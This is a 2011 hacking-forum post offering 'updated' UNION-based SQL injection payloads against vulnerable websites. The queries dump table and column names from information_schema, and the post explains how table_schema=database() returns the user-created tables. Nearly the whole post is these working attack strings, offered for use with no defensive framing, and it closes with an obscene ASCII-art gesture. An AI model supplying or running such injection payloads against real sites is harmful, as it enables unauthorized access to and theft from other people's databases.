HomeForumsComputersHacking

Some Updated Queries For SQL Injection

5 replies [Last post]
1 March, 2011 - 20:54
scryptz0
scryptz0's picture
Offline
SX Recruit
Joined: 2010/11/22
Posts:

I would just like to correct some queries for sql injection so that some would not have some problems in inserting queries to an sql vulnerable site.

PROBLEM

union select 1,2,group_concat(table_name),4,5 from information_schema.tables--

  • or

    • union select all 1,2,group_concat(table_name),4,5 from information_schema.tables where table_schema=database()

    And so here is the latest update in order to fix the problem:

  • Updated

  • union select 1,2,group_concat(table_name),4,5 +from+information_schema.tables+where+ table_schema=database()--

    or

    union select 1,2,group_concat(column_name),4,5 +from+information_schema.columns+where table_schema=database()--  

    ==================================
    > table_schema is the database so when you type table_schema=database() it returns true and dumps all user created tables, which is also the same for columns

    • Bookmark/Search this post with

    .(....\............../....)
    . \....\........... /..../
    ...\....\........../..../
    ....\..../´¯.I.¯`\./
    ..../... I....I..(¯¯¯`\
    ...I.....I....I...¯¯.\...\
    ...I.....I´¯.I´¯.I..\...)
    ...\.....` ¯..¯ ´.......'
    ....\_________.·´

    Top